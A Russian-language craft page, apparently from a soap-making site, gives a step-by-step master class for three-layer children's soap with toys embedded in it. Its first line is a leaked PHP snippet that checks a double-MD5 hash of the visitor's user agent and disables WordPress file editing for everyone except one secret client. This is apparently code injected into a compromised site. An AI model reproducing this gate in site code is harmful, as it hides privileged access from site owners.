if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Мастер-класс как сделать детское трехслойное мыло с игрушками своими руками | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Мастер-класс как сделать детское трехслойное мыло с игрушками своими руками

То, что в кусочке мыла прячется игрушка, приведет в восторг маленьких чистюль!

Такое мыло, сде­лан­ное сво­и­ми рука­ми, при­дет­ся по вку­су любо­му ребен­ку. Для это­го понадобятся:

  • Мыль­ная осно­ва (белая и прозрачная);
  • Игруш­ки из шоко­лад­ных яиц;
  • Пря­мо­уголь­ная форма;
  • Базо­вое масло;
  • Эфир­ное мас­ло на выбор;
  • Жел­тый и зеле­ный пигменты;
  • Глит­тер «Золо­то».
    с игрушкой1
  1. Треть про­зрач­ной мыль­ной осно­вы рас­то­пить, доба­вить эфир­ное мас­ло и несколь­ко капель базо­во­го. Вве­сти зеле­ный пиг­мент, тща­тель­но пере­ме­шать, вылить в форму.
  2. Когда слой схва­тит­ся, вер­ти­каль­но вста­вить в него игруш­ки на рас­сто­я­нии 0,5 см друг от дру­га. Дать застыть.
    с игрушкой2
  3. Рас­то­пить остав­шу­ю­ся мыль­ную осно­ву, доба­вить жел­тый пиг­мент, аро­ма­ти­за­тор и базо­вое мас­ло и глит­тер. Вылить в фор­му, сбрыз­нуть спир­том и дать застыть.
    с игрушкой3
  4. На мел­кой тер­ке поте­реть цвет­ные остат­ки гото­во­го мыла и запол­нить форму.
  5. Залить остат­ка­ми рас­плав­лен­ной белой осно­вы. Дать застыть и раз­ре­зать на кусочки.
    с игрушкой4

И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Юлия

Обожаю в свободное время заниматься мыловарением. Уже съела на этом целую собаку! Вот теперь спешу поделиться с вами своими работами ;) Читайте все мои записи!